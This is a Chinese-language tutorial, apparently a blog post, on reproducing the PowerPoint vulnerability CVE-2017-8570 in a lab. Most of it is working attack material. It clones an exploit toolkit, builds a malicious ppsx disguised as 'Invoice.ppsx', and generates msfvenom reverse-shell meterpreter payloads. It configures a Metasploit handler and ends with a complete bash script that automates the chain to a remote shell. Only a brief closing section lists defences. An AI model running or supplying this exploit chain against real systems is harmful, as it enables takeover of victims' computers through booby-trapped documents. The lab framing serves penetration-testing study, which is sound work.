CVE-2017-8570漏洞复现及自动化利用脚本编写指南<\/h1>

漏洞概述<\/h2>

CVE-2017-8570是Microsoft PowerPoint演示文稿中的一个远程代码执行漏洞，影响多个Office版本：<\/p>

Microsoft Office 2007 Service Pack 3<\/li>
Microsoft Office 2010 Service Pack 2 (32-bit和64-bit版本)<\/li>
Microsoft Office 2013 RT Service Pack 1<\/li>
Microsoft Office 2013 Service Pack 1 (32-bit和64-bit版本)<\/li>

Microsoft Office 2016 (32-bit和64-bit版本)<\/li> <\/ul>

攻击者可以通过发送特制的ppsx(Office 2007及以后版本的演示文稿格式)文件，当用户打开放映时就会触发漏洞。<\/p>

实验环境配置<\/h2>

攻击机配置<\/h3>

系统：Kali Linux<\/li>
IP地址：192.168.1.212<\/li>

工具：Metasploit Framework、Python<\/li> <\/ul>

靶机配置<\/h3>

系统：Windows 7<\/li>
IP地址：192.168.1.165<\/li>

软件：存在漏洞的Office 2010<\/li> <\/ul>

漏洞利用步骤详解<\/h2>

1. 下载漏洞利用脚本<\/h3>

在Kali终端中执行：<\/p>

git clone https:\/\/github.com\/tezukanice\/Office8570.git
<\/span><\/span><\/code><\/pre>2. 生成恶意ppsx文件<\/h3>
进入脚本目录并执行：<\/p>
cd Office8570
<\/span><\/span>mkdir template
<\/span><\/span>mv template.ppsx template\/template.ppsx
<\/span><\/span>python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http:\/\/192.168.1.212\/logo.doc
<\/span><\/span><\/code><\/pre>3. 生成反弹shell木马<\/h3>
对于64位系统：<\/p>
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.1.212 LPORT=<\/span>7777<\/span> -f exe > \/var\/Office8570\/shell.exe
<\/span><\/span><\/code><\/pre>对于32位系统：<\/p>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.1.212 LPORT=<\/span>7777<\/span> -f exe > \/var\/Office8570\/shell.exe
<\/span><\/span><\/code><\/pre>4. 设置HTTP服务器监听<\/h3>
python cve-2017-8570_toolkit.py -M exp -e http:\/\/192.168.1.212\/shell.exe -l \/var\/Office8570\/shell.exe
<\/span><\/span><\/code><\/pre>5. 配置MSF监听<\/h3>
启动msfconsole：<\/p>
msfconsole
<\/span><\/span><\/code><\/pre>在msf中执行：<\/p>
use exploit\/multi\/handler
<\/span><\/span>set LHOST 192.168.1.212
<\/span><\/span>set LPORT 7777<\/span>
<\/span><\/span>set PAYLOAD windows\/x64\/meterpreter\/reverse_tcp  # 32位系统使用windows\/meterpreter\/reverse_tcp<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>自动化脚本实现<\/h2>
脚本功能<\/h3>

自动下载漏洞利用脚本<\/li>
生成恶意ppsx文件<\/li>
创建反弹shell<\/li>
设置HTTP服务器<\/li>
配置MSF监听<\/li>
<\/ol>
完整脚本代码<\/h3>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>
<\/span><\/span>attack_ip=<\/span>"192.168.1.212"<\/span>
<\/span><\/span>LPORT=<\/span>"6666"<\/span>
<\/span><\/span>DIR=<\/span>"\/var\/cve2017"<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> [<\/span> -d ${<\/span>DIR}<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    rm -rf ${<\/span>DIR}<\/span>
<\/span><\/span>    mkdir ${<\/span>DIR}<\/span>
<\/span><\/span>else<\/span>
<\/span><\/span>    mkdir ${<\/span>DIR}<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span>cd $DIR
<\/span><\/span>`<\/span>git clone https:\/\/github.com\/tezukanice\/Office8570.git`<\/span>
<\/span><\/span>cd Office8570
<\/span><\/span>mkdir template
<\/span><\/span>mv template.ppsx template\/template.ppsx
<\/span><\/span>python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http:\/\/$attack_ip"\/logo.doc"<\/span>
<\/span><\/span>`<\/span>msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>${<\/span>attack_ip}<\/span> LPORT=<\/span>${<\/span>LPORT}<\/span> -f exe > ${<\/span>DIR}<\/span>\/shell.exe`<\/span>
<\/span><\/span>
<\/span><\/span>gnome-terminal -e "python cve-2017-8570_toolkit.py -M exp -e http:\/\/<\/span>${<\/span>attack_ip}<\/span>\/shell.exe -l <\/span>${<\/span>DIR}<\/span>\/shell.exe"<\/span>
<\/span><\/span>
<\/span><\/span>`<\/span>service postgresql start`<\/span>
<\/span><\/span>if<\/span> [<\/span> -f "exp.rc"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    rm "exp.rc"<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span>echo "use exploit\/multi\/handler"<\/span>>>exp.rc
<\/span><\/span>echo "set LHOST "<\/span>$attack_ip>>exp.rc
<\/span><\/span>echo "set LPORT "<\/span>$LPORT>>exp.rc
<\/span><\/span>echo "set PAYLOAD windows\/x64\/meterpreter\/reverse_tcp"<\/span>>>exp.rc
<\/span><\/span>echo "exploit"<\/span>>>exp.rc
<\/span><\/span>gnome-terminal -e "msfconsole -r exp.rc"<\/span>
<\/span><\/span><\/code><\/pre>脚本使用说明<\/h3>

下载脚本：<\/li>
<\/ol>
git clone https:\/\/github.com\/Drac0nids\/CVE-2017-8570.git
<\/span><\/span><\/code><\/pre>
修改脚本参数：<\/li>
<\/ol>

attack_ip<\/code>：设置为Kali的IP地址<\/li>
LPORT<\/code>：设置MSF监听的端口<\/li>
DIR<\/code>：设置工作目录（必须为空目录）<\/li>
<\/ul>

赋予执行权限：<\/li>
<\/ol>
chmod 777<\/span> auto
<\/span><\/span><\/code><\/pre>
运行脚本：<\/li>
<\/ol>
.\/auto
<\/span><\/span><\/code><\/pre>
生成的恶意文件路径：

$DIR\/Office8570\/Invoice.ppsx<\/code><\/li>
<\/ol>
技术要点解析<\/h2>

反引号(`)的使用<\/strong>：用于确保命令按顺序执行<\/li>
文件重定向(>>)<\/strong>：用于将配置写入msf的rc脚本<\/li>
gnome-terminal -e<\/strong>：用于在新终端窗口中运行命令<\/li>
rc脚本<\/strong>：用于自动化配置MSF<\/li>
目录结构处理<\/strong>：自动创建和清理工作目录<\/li>
<\/ol>
防御建议<\/h2>

及时安装Microsoft发布的安全更新<\/li>
禁用Office中的宏执行<\/li>
不要打开来源不明的Office文档<\/li>
使用受保护的视图打开可疑文档<\/li>
部署终端防护软件监控可疑行为<\/li>
<\/ol>
总结<\/h2>
本文详细介绍了CVE-2017-8570漏洞的复现过程，并提供了一个完整的自动化利用脚本。该脚本整合了从下载利用工具到最终获取meterpreter shell的全过程，大大提高了渗透测试效率。同时，也提供了针对该漏洞的防御措施，帮助系统管理员加固系统安全。<\/p>